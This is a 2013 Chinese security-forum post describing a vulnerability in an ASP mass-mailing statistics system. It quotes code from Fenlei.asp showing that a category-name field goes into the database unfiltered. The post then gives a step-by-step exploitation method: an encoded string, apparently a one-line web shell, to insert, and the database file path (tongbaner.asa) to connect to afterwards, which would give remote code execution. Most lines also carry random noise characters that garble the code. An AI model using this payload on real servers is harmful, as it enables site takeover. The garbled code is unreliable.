找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1857|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 0 i' K- L- G- m- n7 t/ U9 E
3 V$ n+ G$ k! h- [% h$ s
IF Request.QueryString("Action")="del" Then
+ z4 [$ r. R: |/ z: y# D) uID=Request.QueryString("ID") - T+ h$ D& O3 F' {$ @+ v& K
IF Countss ("tui","Fenlei",ID )<>0 then / u0 J6 Q# v" _: C& U2 U- t
'略 4 O; w! M2 n% ^6 S6 I
IF Request.QueryString("Action")="Add" Then 2 x' G, ]2 c& I0 c7 Z$ j7 W
Tname=Request.Form("Typename")   b7 M3 F  `* L
Set Rs=Server.CreateObject("adodb.Recordset")
: P- \5 o. E9 q( {9 x$ [) JSql="Select * From Fenlei Order by id Desc " , V* D, X- e  G# g% a1 U7 O
Rs.Open Sql,Conn,1,3
/ V, A' ]3 I+ n& L/ u8 JRs.Addnew ; T; _" Q( @3 S, i7 }
Rs("Typename")=Tname 8 S! G3 f0 d( J* X! Q7 G6 g
'略
9 M* U( @; K+ d5 J& p# SSet Rs=Server.CreateObject("adodb.Recordset") 3 f1 w! f, q6 e/ c5 g
Sql="Select * From Fenlei Order by id Desc " " E& l8 N$ d4 n8 B
Rs.Open Sql,Conn,1,1 2 d2 R9 v) [9 v% G9 x9 Z
'略 4 x9 Y7 W; Q' Y; a. Z5 s& j9 v
%>' b6 U" f+ C% c" ~  j
6 M4 f) d4 E& g9 E: k$ |3 R8 _
0 H' x+ @2 d/ h' v5 G2 t
" P1 S4 H4 g1 F# A
没有过滤,直接写入数据库。  i7 u- M( ?' J$ b# X2 X
4 B! A6 t+ R# ]2 J# e
利用方法:8 c: b" ^3 f8 D" {
$ R% M$ d5 m4 k- i
插入:┼攠數畣整爠煥敵瑳∨≡┩>
1 a$ G) U1 A/ b
: f, W, `+ Q; I, H: l' o  `; w& \
- w/ \2 K# I6 i: x' h6 I连接: http://www.xxx.com/###tongbaner.asa
. T, q6 [: D. |) u1 }'默认安装文件:
8 Z# h  z. ~+ J0 \/ [  l. J'install.asp
1 h' @! O+ L/ L8 ^2 w6 l! C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表